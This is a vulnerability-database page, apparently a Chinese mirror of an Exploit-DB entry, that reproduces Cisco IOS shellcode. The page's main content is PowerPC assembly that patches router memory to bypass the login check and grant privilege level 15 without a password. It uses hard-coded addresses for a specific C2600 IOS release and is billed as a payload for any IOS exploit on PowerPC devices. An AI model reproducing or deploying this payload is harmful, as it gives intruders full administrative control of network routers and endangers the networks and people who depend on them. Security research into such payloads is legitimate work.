Cisco IOS - New TTY + Privilege Level To 15 + No Password Shellcode

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056781 漏洞类型
发布时间 2008-08-13 更新时间 2008-08-13
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Hardware CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13293
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# ----------------------------------------------------------------------------------------
#
# Cisco IOS Tiny shellcode v1.0
# (c) 2007 IRM Plc
# By Gyan Chawdhary
#
# ----------------------------------------------------------------------------------------
#
# The code creates a new TTY, and sets the privilege level to 15 without a password
#
# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device.
# 
#
# The following two hard-coded addresses must be located for the target IOS version. 
#
# The hard-coded addresses used here are for:
#
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
#
# ----------------------------------------------------------------------------------------
.equ ret, 0x804a42e8
.equ login, 0x8359b1f4
.equ god, 0xff100000
.equ priv, 0x8359be64
# ----------------------------------------------------------------------------------------

main:

	# login patch begin
	lis 9, login@ha
	la 9, login@l(9)
	li 8,0
	stw 8, 0(9)
	# login patch end

	# priv patch begin
	lis 9, priv@ha
	la 9, priv@l(9)
	lis 8, god@ha
	la 8, god@l(8)
	stw 8, 0(9)
	# priv patch end 
	
	# exit code
      lis     10, ret@ha
      addi    4, 10, ret@l
      mtctr   4
      bctrl

# milw0rm.com [2008-08-13]